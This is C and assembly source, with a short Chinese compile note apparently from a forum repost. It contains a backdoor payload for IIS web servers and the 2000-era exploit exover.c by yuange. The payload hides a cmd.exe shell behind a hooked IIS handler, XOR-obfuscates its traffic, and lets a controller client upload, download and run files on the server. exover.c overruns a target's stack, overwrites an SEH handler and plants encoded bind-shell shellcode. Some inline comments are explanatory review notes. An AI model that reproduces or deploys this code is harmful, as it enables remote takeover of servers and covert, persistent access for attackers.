// (command line in stradd2) with stdin/stdout/stderr on two pipes.
iiscmd:
/*
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
*/
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);
// ZeroMemory(&siinfo,sizeof(siinfo));
_asm{
lea EDI,siinfo
xor eax,eax
mov ecx,0x11
repnz stosd
}
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;
k=0;
// while(k==0)
// {
k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo,
&ProcessInformation);
// stradd+=8;
// }
Sleepadd(200);
// PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
// Relay loop: forward cmd.exe output to the client (XOR-encoded); after
// 50 empty polls block on readclient for the next client command.
i=0;
while(1) {
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
if(lBytesRead>0) {
i=0;
ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(lBytesRead>0) {
for(k=0;k<lBytesRead;++k){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[k]^=lockcharvar; // DATAXORCODE;
// Buff[k]^=DATAXORCODE;
}
writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
// Sleepadd(20);
}
}
else{
// Sleepadd(10);
l=0;
if(i<50){
l=1;
++i;
k=1;
lBytesRead=0;
}
while(l==0){
i=0;
lBytesRead=SHELLBUFFSIZE;
k=readclient(ConnID,Buff,&lBytesRead);
for(l=0;l<lBytesRead;++l){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[l]^=lockcharvar; // DATAXORCODE;
}
// "iisc <cmdline>": tell the current cmd.exe to exit, then restart with
// the new command line.
if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2]=='s'&&Buff[3]=='c'&&Buff[4]==' '){
k=8;
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
stradd2=Buff+5;
Buff[lBytesRead]=0;
goto iiscmd;
}
// "reset": echo "xordatareset" (0x0c bytes at stradd+0x11) and reseed.
if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Buff[2]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){
lBytesRead=0x0c;
writeclient(ConnID,stradd+0x11,&lBytesRead,0);
lockintvar1=shelllocknum%LOCKBIGNUM;
lockintvar2=lockintvar1;
lBytesRead=0;
}
// "iisrr": exit cmd.exe, clear the door target and hang this thread.
if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){
k=8;
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
*(int *)(dooradd-0x0c)=0;
Sleepadd(0x7fffffff);
_asm{
mov eax,0
mov esp,0
jmp eax
}
}
// "put <size:4><name>": receive `size` bytes and write them to a file on
// the server (counterpart of the client's iisput).
if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]
==' ')
{
l=*(int *)(Buff+4);
//
WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+
GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
);
k=GetLastErroradd();
i=0;
while(l>0){
lBytesRead=SHELLBUFFSIZE;
k=readclient(ConnID,Buff,&lBytesRead);
if(k==1){
if(lBytesRead>0){
for(k=0;k<lBytesRead;++k){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[k]^=lockcharvar; //
DATAXORCODE;
}
l-=lBytesRead;
// if(fpt>0)
WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
// else Sleepadd(010);
}
// if(i>100) l=0;
}
else {
Sleepadd(0100);
++i;
}
if(i>10000) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else{
// "get <name>": reply with "size" + 4-byte length, then the file contents
// (counterpart of the client's iisget).
if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]
==' '){
//
fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,
NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
Sleepadd(100);
l=GetFileSizeadd(fpt,&k);
*(int *)Buff='ezis'; //size
*(int *)(Buff+4)=l;
lBytesRead=8;
for(i=0;i<lBytesRead;++i){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar; // DATAXORCODE;
}
writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
// Sleepadd(100);
i=0;
while(l>0){
k=SHELLBUFFSIZE;
ReadFileadd(fpt,Buff,k,&k,0);
if(k>0){
for(i=0;i<k;++i){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM
;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar; //
DATAXORCODE;
}
i=0;
l-=k;
writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC);
// Sleepadd(100);
//
k=readclient(ConnID,Buff,&lBytesRead);
}
else ++i;
if(i>100) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else l=1;
}
}
// readclient failed: exit cmd.exe; if the connection is gone (0x2746 =
// WSAECONNRESET) either return to IIS through the door or sleep forever.
if(k!=1){
k=8;
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
k=GetLastErroradd();
while(k==0x2746){
if(thedoor==1) goto asmreturn;
Sleepadd(0x7fffffff); // hang
}
}
else{
// Anything else is typed into cmd.exe's stdin.
WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
// Sleepadd(1000);
}
}
}
// Reached when GetProcAddress could not be found: spin forever.
die: goto die ;
// Stubs referenced above by label; the byte-size comments are the
// author's and give the offsets used in dooradd-0x13 / -0x0c / -7 and
// stradd-7 / -0xe.
_asm{
asmreturn:
mov eax,HSE_STATUS_SUCCESS
leave
ret 04
door: push eax
mov eax,[esp+0x08]
mov eax,[eax+0x64]
mov eax,[eax]
cmp eax,'ok!!'
jnz jmpold
pop eax
push 0x12345678 //dooradd-0x13
ret
jmpold: pop eax
push 0x12345678 //dooradd-0xc
ret //1
jmp door //2
getdoorcall: call getdooradd //5
getexceptretadd: pop eax
push eax
mov edi,dword ptr [stradd]
mov dword ptr [edi-0x0e],eax
ret
errprogram: mov eax,dword ptr [esp+0x0c]
add eax,0xb8
mov dword ptr [eax],0x11223344 //stradd-0xe
xor eax,eax //2
ret //1
execptprogram: jmp errprogram //2 bytes stradd-7
nextcall: call getstradd //5 bytes
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
/*
 * Neutralise the compiler-inserted _chkesp calls in a copied function image.
 * For every 0xe8 (call rel32) in shellbuff[0..len) whose target, computed
 * relative to the function's original address fnadd, equals chkesp, the
 * 5-byte call is replaced by nop / inc ebx / dec ebx / inc ebx / dec ebx so
 * the copy no longer references the CRT.
 *
 * fnadd     - address the code was copied from (used for the rel32 maths)
 * shellbuff - the copy, patched in place
 * chkesp    - resolved address of _chkesp
 * len       - bytes to scan
 * NOTE(review): the rel32 read at i+1..i+4 and the writes up to i+4 are not
 * bounded by len, so a 0xe8 in the last four bytes reads/writes past it.
 */
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
int i,k;
unsigned char temp;
char *calladd;
for(i=0;i<len;++i){
temp=shellbuff[i];
if(temp==0xe8){
k=*(int *)(shellbuff+i+1);
calladd=fnadd;
calladd+=k;
calladd+=i;
calladd+=5; // call target = address of next instruction + rel32
if(calladd==chkesp){
shellbuff[i]=0x90;
shellbuff[i+1]=0x43; // inc ebx
shellbuff[i+2]=0x4b; // dec ebx
shellbuff[i+3]=0x43;
shellbuff[i+4]=0x4b;
}
}
}
}
/*
 * Console command "iisput <localfile> [remotename]": upload a local file.
 * Parses up to two blank-separated names from str (in place, NUL-terminating
 * them), then sends "put " + 4-byte file size + remote name at offset 8,
 * followed by the file contents in 0x800-byte chunks, all through newsend
 * (XOR stream).  The socket is switched to blocking for the transfer and
 * back to non-blocking afterwards.
 *
 * fd  - connected socket
 * str - the rest of the console line after "iisput" (modified in place)
 * NOTE(review): filename/filename2 are compared to the literal "\x0" by
 * pointer, which only works if the compiler pools identical literals.
 * NOTE(review): CreateFile's result is not checked; on failure
 * GetFileSize/ReadFile run on INVALID_HANDLE_VALUE and the loop never ends
 * while filesize>0.  fpt is declared FILE* but holds a HANDLE.
 */
void iisput(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
// first token
for(i=0;i<j;++i,++str){
if(*str!=' '){
filename=str;
break;
}
}
for(;i<j;++i,++str){
if(*str==' ') {
*str=0;
break;
}
}
++i;
++str;
// optional second token
for(;i<j;++i,++str){
if(*str!=' '){
filename2=str;
break;
}
}
for(;i<j;++i,++str){
if(*str==' ') {
*str=0;
break;
}
}
if(filename=="\x0") {
printf("\n iisput filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin put file:%s",filename);
j=0;
ioctlsocket(fd, FIONBIO, &j);
Sleep(1000);
fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,0);
filesize=GetFileSize(fpt,&filesizehigh);
// Header: "put " + size (native int) + remote name; i here is the parse
// position, so i+9 is the header length as the author computed it.
strcpy(buff,"put ");
*(int *)(buff+4)=filesize;
filesize=*(int *)(buff+4);
strcpy(buff+0x8,filename2);
newsend(fd,buff,i+0x9,0);
printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize);
Sleep(1000);
while(filesize>0){
size=0x800;
ReadFile(fpt,buff,size,&size,NULL);
if(size>0){
filesize-=size;
newsend(fd,buff,size,0);
// Sleep(0100);
}
}
// size=filesize;
// ReadFile(fpt,buff,size,&size,NULL);
// if(size>0) send(fd,buff,size,0);
CloseHandle(fpt);
j=1;
ioctlsocket(fd, FIONBIO, &j);
printf("\n put file ok!\n");
Sleep(1000);
}
/*
 * Console command "iisget <localfile> [remotename]": download a file.
 * Parses the two names like iisput, creates the local file, sends "get " +
 * remote name, waits for a reply starting with "size" (4-byte length at
 * offset 4; anything that arrives before it is printed), and writes the
 * remaining bytes to the local file until `filesize` bytes are consumed.
 *
 * fd  - connected socket
 * str - the rest of the console line after "iisget" (modified in place)
 * NOTE(review): same unchecked CreateFileA and literal-pointer comparison
 * as iisput.  If the server never sends "size", the loop stops after 100
 * empty polls with filesize==0 and the local file is left empty.
 */
void iisget(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
// first token
for(i=0;i<j;++i,++str){
if(*str!=' '){
filename=str;
break;
}
}
for(;i<j;++i,++str){
if(*str==' ') {
*str=0;
break;
}
}
++i;
++str;
// optional second token
for(;i<j;++i,++str){
if(*str!=' '){
filename2=str;
break;
}
}
for(;i<j;++i,++str){
if(*str==' ') {
*str=0;
break;
}
}
if(filename=="\x0") {
printf("\n iisget filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin get file:%s",filename);
fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
strcpy(buff,"get ");
strcpy(buff+0x4,filename2);
newsend(fd,buff,i+0x5,0);
printf("\n get file:%s from file:%s",filename,filename2);
j=0;
ioctlsocket(fd, FIONBIO, &j);
i=0;
filesize=0;
j=0;
// Wait for the "size" header; j counts consecutive empty receives.
while(j<100){
// Sleep(100);
i=newrecv(fd,buff,0x800,0);
if(i>0){
buff[i]=0;
if(memcmp(buff,"size",4)==0){
filesize=*(int *)(buff+4);
j=100;
}
else {
/* for(j=0;j<i;++j){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[j]^=lockcharvar; // DATAXORCODE;
}
*/
j=0;
printf("\n recv %s",buff);
}
}
else ++j;
// if(j>1000) i=0;
}
printf("\n file %d bytes %d\n",filesize,i);
// Any data that followed the 8-byte header in the same receive is file content.
if(i>8){
i-=8;
filesize-=i;
WriteFile(fpt,buff+8,i,&i,NULL);
}
while(filesize>0){
size=newrecv(fd,buff,0x800,0);
if(size>0){
filesize-=size;
WriteFile(fpt,buff,size,&size,NULL);
}
else {
if(size==0) {
printf("\n ftp close \n ");
}
else {
printf("\n Sleep(100)");
Sleep(100);
}
}
}
CloseHandle(fpt);
printf("\n get file ok!\n");
j=1;
ioctlsocket(fd, FIONBIO, &j);
}
/*
 * Console command "iisreset": resynchronise the XOR stream with the server.
 * Sends "reset", reseeds the local stream state from the constants, then
 * reads (blocking) until a buffer containing "xordatareset" arrives and
 * decodes whatever follows that marker with the fresh receive key.
 *
 * fd  - connected socket
 * str - unused
 * NOTE(review): the receive loop has no exit other than seeing the marker;
 * recv() returning 0 or -1 loops forever.
 */
void iisreset(int fd,char *str){
char buff[0x2000];
int i,j;
printf("\nreset xor data.\n");
Sleep(1000);
j=0;
ioctlsocket(fd, FIONBIO, &j);
strcpy(buff,"reset");
newsend(fd,buff,strlen(buff),0);
Sleep(1000);
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
while(1){
j=recv(fd,buff,0x2000,0);
if(j>0){
buff[j]=0;
// NUL bytes would stop strstr early; replace them before searching.
for(i=0;i<j;++i){
if(buff[i]==0) buff[i]='b';
}
// printf("\nrecv 0x%x bytes:%s",j,buff);
if(strstr(buff,"xordatareset")!=0){
printf("\nxor data reset ok.\n");
for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
}
break;
}
}
// else if(j==0) break;
// strcpy(buff,"\r\nmkdir d:\\test6\r\n");
// newsend(fd,buff,strlen(buff),0);
}
Sleep(1000);
j=1;
ioctlsocket(fd, FIONBIO, &j);
// printf("aaa");
}
/*
 * Console command "iisdie": send "iisrr " to the payload (which then exits
 * its cmd.exe and hangs its thread) and reseed the local XOR stream.
 *
 * fd  - connected socket
 * str - unused
 */
void iisdie(int fd,char *str){
char buff[0x200];
int j;
printf("\niis die.\n");
j=0;
ioctlsocket(fd, FIONBIO, &j);
Sleep(1000);
strcpy(buff,"iisrr ");
newsend(fd,buff,strlen(buff),0);
Sleep(1000);
j=1;
ioctlsocket(fd, FIONBIO, &j);
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
}
/*
 * Console command "iiscmd <command line>": ask the payload to restart
 * cmd.exe with the given command line.  Leading and trailing blanks are
 * trimmed in place; the line is sent as "iisc " + cmd through newsend.
 *
 * fd  - connected socket
 * str - the rest of the console line after "iiscmd" (modified in place)
 * NOTE(review): buff is 2000 bytes but cmd comes from a BUFFSIZE gets()
 * buffer and is strcat'ed unbounded.  cmd is compared to the literal "\x0"
 * by pointer (see iisput).
 */
void iiscmd(int fd,char *str){
char *cmd="\0";
char buff[2000];
int i,j;
j=strlen(str);
for(i=0;i<j;++i,++str){
if(*str!=' '){
cmd=str;
break;
}
}
// Trim trailing blanks.
j=strlen(str);
for(i=0;i<j;++i){
if(*(str+j-i-1)!=' ') {
break;
}
else *(str+j-i-1)=0;
}
if(cmd=="\x0") {
printf("\niiscmd cmd\n");
return;
}
printf("\nbegin run cmd:%s",cmd);
j=0;
ioctlsocket(fd, FIONBIO, &j);
Sleep(1000);
strcpy(buff,"iisc ");
strcat(buff,cmd);
newsend(fd,buff,strlen(buff),0);
Sleep(1000);
j=1;
ioctlsocket(fd, FIONBIO, &j);
/*
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
*/
}
/*
 * recv() wrapper that undoes the XOR stream.  Once xordatabegin is set every
 * received byte is XORed with the next key byte (receive state lockintvar1).
 * Before that, the buffer is scanned for "XORDATA": if found, decoding
 * starts 8 bytes after the marker and xordatabegin is set for later calls.
 * Key byte = ((state * 0x100) % LOCKBIGNUM) % 0x100 — a fixed, secret-less
 * sequence, so an observer can decode the same traffic.
 *
 * Returns the recv() result (byte count, 0 or SOCKET_ERROR).
 * NOTE(review): buff[k]=0 writes one past the data when k==size.
 */
int newrecv(int fd,char *buff,int size,int flag){
int i,k;
k=recv(fd,buff,size,flag);
if(xordatabegin==1){
for(i=0;i<k;++i){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
}
}
else{
if(k>0){
buff[k]=0;
if(strstr(buff,"XORDATA")!=0) {
xordatabegin=1;
for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
}
}
}
}
return(k);
}
/*
 * send() wrapper that applies the XOR stream (send state lockintvar2) to
 * buff in place before sending; the caller's buffer is modified.  Same key
 * derivation as newrecv, seeded from constants — obfuscation only.
 *
 * Returns the send() result.
 */
int newsend(int fd,char *buff,int size,int flag){
int i;
for(i=0;i<size;++i){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
// buff[i]^=DATAXORCODE;
}
return(send(fd,buff,size,flag));
}
/* Print the console command summary (the "iish" command in main). */
void iishelp(){
printf("\nusage:");
printf("\niisget filename filename. get file from web server.");
printf("\niisput filename filename. put file to web server.");
printf("\niiscmd cmd. run cmd on web server.");
printf("\niisreset. reset the xor data.");
printf("\niisdie. reset the asp door.");
printf("\n\n");
}
网址http://www.nsfocus.net/index.php?act=magazine&do=view&mid=682
包含两个独立的源程序代码:except.c和exover.c,分别是存在漏洞的程序和攻击程序。
对于except.c,欲成功编译,需要加上ws2_32.lib库文件的支持,加在#include头文件之后,即:
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
// 增加对ws2_32.lib库文件的支持
#pragma comment (lib, "ws2_32.lib")
int main(int argc, char **argv)
而对exover.c,需要作如下修改:
1、增加
#pragma comment (lib, "ws2_32.lib")
2、将某些被回车换行符割断的变量名和代码行接到一行上(看VC提示哪行报错,转到那行就明白了)
3、代码段
_asm {
mov ESI,ESP
cmp ESI,ESP
}
前的大括号}是多余的,必须去掉
修改后的代码如下供参考,同样编译通过,但能否实现袁哥所说的攻击请测试一下:
/*
利用异常结构绕过溢出保护攻击的攻击程序exover.c。
上面程序运行在win2000下此攻击程序溢出成功。
vc6.0下编译通过。
yuange@nsfocus.com
*/ /*
except overflow program ver 1.0
copy by yuange <yuange@163.net> 2000.06.20
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#pragma comment (lib, "ws2_32.lib")
#define FNENDLONG 0x08   // bytes of fnendstr compared when locating a function's NOP end marker
#define NOPCODE 0x90
#define NOPLONG 0x20
#define BUFFSIZE 0x20000
#define RETEIPADDRESS 0x0
#define SHELLPORT 0x1f90
/* 0x1f90=8080 */
#define WEBPORT 1080
// shellcodefnlock/shellcodefn are never called; main copies their code bytes.
void shellcodefnlock();
void shellcodefn();
void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);
/*
 * Driver for the SEH-overwrite demonstration: builds one request buffer that
 * overruns the target's stack, lays an overwrite pattern over an exception
 * registration record, and carries the encoded payload that is copied out of
 * shellcodefnlock() (decoder stub) and shellcodefn() (payload body).
 *
 * argv[1] = server (dotted quad or host name)
 * argv[2] = port the payload will listen on (default SHELLPORT)
 * argv[3] = port to connect to (default WEBPORT)
 * Returns 0 after a single send/recv exchange; exit(1) on any setup failure.
 *
 * NOTE(review): eipwinnt and the OVERADD/OVERADD2 offsets are constants for one
 * specific target build. Overwriting an SEH record's handler pointer is the
 * technique that SafeSEH, SEHOP and stack cookies were later introduced to
 * defeat; the program is only of historical/educational value today.
 */
int main(int argc, char **argv)
{
char *server;
/*
 * String block that is appended directly after the payload code. The first two
 * bytes are a placeholder for the listen port (overwritten below), followed by
 * the NUL-separated API names the payload resolves in this order, the DLL it
 * loads, the command line and an "exit\r\n" line. "strend" only terminates
 * the length scan below and is not copied.
 */
char *str="\x1f\x90""LoadLibraryA""\x0""CreatePipe""\x0"
"CreateProcessA""\x0""CloseHandle""\x0"
"PeekNamedPipe""\x0"
"ReadFile""\x0""WriteFile""\x0"
"wsock32.dll""\x0""socket""\x0"
"bind""\x0""listen""\x0"
"accept""\x0""send""\x0"
"recv""\x0""ioctlsocket""\x0"
"closesocket""\x0"
"cmd.exe""\x0""exit\x0d\x0a""\x0"
"strend";
/* strings (API names etc.) used by the shellcode */
/*
 * NOP marker: both shellcode functions begin and end with a run of NOPs, and
 * FNENDLONG (8) bytes of this string are compared to locate those runs.
 */
char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char eipwinnt[]="\x63\x0d\xfa\x7f";
/* jmp ebx address (little-endian); written over the SEH handler pointer */
/*
 * When an exception is raised on win2000, ebx points at the exception
 * registration record; on winnt some builds use esi and others edi.
 */
char JMPNEXTJMP[]="\x90\x90\x90\x2d";
/*
 * 0x2d is "sub eax,imm32": it swallows the following 4 arbitrary bytes, so the
 * repeated overwrite pattern written over the record executes like a run of
 * NOPs when it is stepped through.
 */
char JMPSHELL[]="\xe9\x40\xf0\xff\xff";   /* jmp rel32, displacement 0xfffff040 */
char buff[BUFFSIZE];                    /* the request that is sent */
char recvbuff[BUFFSIZE];
char shellcodebuff[0x1000];             /* raw (unencoded) payload: code + string block */
struct sockaddr_in s_in2,s_in3;         /* s_in2 is unused */
struct hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned int sendpacketlong;
int i,j,k;
unsigned char temp;
int fd;
u_short port,port1,shellcodeport;       /* port1 is unused */
SOCKET d_ip;
WSADATA wsaData;
int offset=0;                           /* unused */
int OVERADD=RETEIPADDRESS;              /* offset in buff where the decoder stub is placed */
int OVERADD2=0xfb8;                     /* offset in buff of the SEH record being overwritten */
int result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(1);
}
/* argv[3] overrides the port to connect to */
if(argc>3) port=atoi(argv[3]);
else port=WEBPORT;
if(argc <2){
WSACleanup( );
fprintf(stderr, "\n except over 1.0.");
fprintf(stderr, "\n copy by yuange 2000.06.20.");
fprintf(stderr, "\n welcome to my homepage http://yuange.yeah.net.");
fprintf(stderr, "\n usage: %s <server> [shellport] [webport] \n", argv[0]);
exit(1);
}
else server = argv[1];
/* dotted quad first, then a name lookup */
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he)
{
WSACleanup( );
printf("\n Can't get the ip of %s !\n",server);
exit(1);
}
else memcpy(&d_ip, he->h_addr, 4);
}
fd = socket(AF_INET, SOCK_STREAM,0);
i=8000;
/* receive timeout; Winsock's SO_RCVTIMEO is in milliseconds */
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
/*
 * NOTE(review): with the brace commented out below, the if governs only
 * closesocket(); WSACleanup(), the "connect err." message and exit(1) run on
 * every path, so as posted execution never reaches the code after this point.
 */
if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0)
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n connect err.");
exit(1);
//}
/*
 * The two instructions below are what MSVC's debug-build _chkesp performs;
 * calling _chkesp and taking its address lets cleanchkesp() later remove the
 * compiler-inserted calls from the copied payload.
 */
__asm {
mov ESI,ESP
cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
/* if the symbol resolves to a "jmp rel32" thunk (0xe9), follow it to the real body */
if(temp==0xe9) {
++chkespadd;
i=*(int*)chkespadd;
chkespadd+=i;
chkespadd+=4;
}
/* same thunk handling for shellcodefnlock, then locate its leading NOP run */
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memset(buff,NOPCODE,BUFFSIZE);   /* everything not written below is a NOP sled */
/* decoder stub: 0x80 bytes starting 4 bytes into the NOP run */
memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);
/* payload body: copy shellcodefn up to its trailing NOP run and strip _chkesp calls */
shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
} for(k=0;k<=0x1000;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memcpy(shellcodebuff,shellcodefnadd,k);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
/* append the string block (up to, not including, "strend") right after the code */
for (i=0;i<0x400;++i){
if(memcmp(str+i,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,i);
/*
 * Listen port for the payload: argv[2] or SHELLPORT, stored in network order
 * over the two placeholder bytes at the start of the string block.
 */
if(argc>2) shellcodeport=atoi(argv[2]);
else shellcodeport=SHELLPORT;
if(shellcodeport==0) shellcodeport=SHELLPORT;
shellcodeport=htons(shellcodeport);
*(u_short *)(shellcodebuff+k)=shellcodeport;
fprintf(stderr,"\n shellport %d",htons(shellcodeport)); sendpacketlong=k+i;
/* k := offset (from the stub) of the stub's trailing NOP run; the encoded payload goes there */
for(k=0;k<=0x200;++k){
if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
}
/*
 * Encode so the payload contains no byte <= 0x10 and no literal '0': such a
 * byte is emitted as '0' followed by (byte + 0x40). The decoder loop in
 * shellcodefnlock() reverses this (on 0x30 it takes the next byte and
 * subtracts 0x40).
 */
for(i=0;i<sendpacketlong;++i){
temp=shellcodebuff[i];
if(temp<=0x10||temp=='0'){
/* encode the shellcode's special characters */
buff[OVERADD+NOPLONG+k]='0';
++k;
temp+=0x40;
}
buff[OVERADD+NOPLONG+k]=temp;
++k;
} for(i=-0x30;i<0x20;i+=8){
memcpy(buff+OVERADD2+i,JMPNEXTJMP,4);
/*
 * Overwrites the "next" link of the exception registration record; when the
 * exception is raised ebx points here. Unlike an ordinary overflow, where ESP
 * lands near the overflowed data, ESP at exception time is not nearby.
 */
memcpy(buff+OVERADD2+i+4,eipwinnt,4);
/*
 * Overwrites the record's handler pointer, which control is transferred to
 * when the exception is raised; the value written is the address of a
 * "jmp ebx" instruction.
 */
}
/*
 * Written repeatedly (every 8 bytes from -0x30 to +0x20) to raise the chance
 * that the record is actually covered.
 */
memcpy(buff+OVERADD2+8,JMPSHELL,5);
/*
 * The jump that transfers control to the shellcode (a long relative jump).
 */
sendpacketlong=0x1000-0x10;
/* single exchange: send the 0xff0-byte request and print whatever comes back */
for(i=0;i<1;++i){
j=sendpacketlong;
fprintf(stderr,"\n send packet %d bytes.",j);
send(fd,buff,j,0);
k=recv(fd,recvbuff,0x1000,0);
if(k>0){
recvbuff[k]=0;   /* k <= 0x1000 < BUFFSIZE, so the terminator fits */
fprintf(stderr,"\n recv:\n %s",recvbuff);
}
}
closesocket(fd);
WSACleanup( );
return(0);
}
/*
 * Decoder stub. main() copies the bytes that follow the leading NOP run into
 * the request, so everything here must be position independent: the
 * jmp/call/pop sequence recovers the address of the encoded bytes that main()
 * writes over the trailing NOP run, and the loop decodes them in place.
 * Execution then falls through into the decoded payload.
 */
